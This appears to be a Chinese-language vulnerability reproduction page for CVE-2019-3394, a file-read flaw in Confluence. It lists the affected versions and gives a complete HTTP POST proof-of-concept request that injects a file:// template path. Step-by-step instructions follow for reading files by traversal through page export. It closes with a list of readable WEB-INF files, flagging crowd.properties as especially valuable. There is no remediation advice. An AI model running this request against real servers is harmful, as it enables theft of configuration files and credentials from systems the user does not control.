menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-3394)Confluence 文件读取漏洞 chevron_right (CVE-2019-3394)Confluence 文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-3394)Confluence 文件读取漏洞.md
    2.56 KB / 2021-07-15 19:49:48
        (CVE-2019-3394)Confluence 文件读取漏洞
    ========================================
    
    一、漏洞简介
    ------------
    
    > (CVE-2019-3394)Confluence 文件读取漏洞
    
    二、影响范围
    ------------
    
    -   6.1.0 \<= version \< 6.6.16
    
    -   6.7.0 \<= version \< 6.13.7
    
    -   6.14.0 \<= version \< 6.15.8
    
    三、复现过程
    ------------
    
    #### poc
    
        POST /rest/tinymce/1/macro/preview  HTTP/1.1
        Host: localhost:8090
        Content-Length: 175
        Accept: text/plain, */*; q=0.01 
        Origin: http://localhost:8090
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 
        Content-Type: application/json; charset=UTF-8
        Referer: http://localhost:8090/ 
        Connection: close
    
        {"contentId":"1","macro":{"name":"widget","params": {"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_templat e":"file:///C:/Windows/win.ini"},"body":""}}
    
    #### 触发条件
    
    1.  一个有效的登录账号
    
    2.  该账号具有在空间「添加页面」的权限
    
    #### 复现步骤
    
    1.创建一个空白页
    
    ![](./resource/(CVE-2019-3394)Confluence文件读取漏洞/media/rId27.png)
    
    2.插入一张网络图片
    
    image
    
    ![](./resource/(CVE-2019-3394)Confluence文件读取漏洞/media/rId28.png)
    
    > 插入url改为你需要查看的文件,例如 /packages/../web.xml
    
    3.点击发布,抓取报文
    
    4.删除多余url前缀,只留下 `/packages/../web.xml` 并放开报文
    
    ![](./resource/(CVE-2019-3394)Confluence文件读取漏洞/media/rId29.png)
    
    5.查看页面源码确认修改成功
    
    ![](./resource/(CVE-2019-3394)Confluence文件读取漏洞/media/rId30.png)
    
    6.导出word,并抓包查看
    
    ![](./resource/(CVE-2019-3394)Confluence文件读取漏洞/media/rId31.png)
    
    ![](./resource/(CVE-2019-3394)Confluence文件读取漏洞/media/rId32.png)
    
    #### 路径说明
    
    由于 `catalina.jar`中的
    `org.apache.catalina.webresources.StandardRoot.class`的
    getResource方法的 `validate`存在过滤和限制,所以可遍历路径均在
    `/WEB-INF`下
    
    可读取的文件大致如下
    
        #WEB-INF下
        decorators.xml
        glue-config.xml
        server-config.wsdd
        sitemesh.xml
        urlrewrite.xml
        web.xml
        #/WEB-INF/classes下
        confluence-filtered-frames.properties
        confluence-init.properties
        crowd.properties(较为重要)
        hash-registry.properties
        lgplTemplate.soy
        log4j-diagnostic.properties
        log4j.properties
        logging.properties
        mime.types
        osuser.xml
        seraph-config.xml
        seraph-paths.xml
        velocity_implicit.vm
        velocity.properties
    
    
    links
    file_download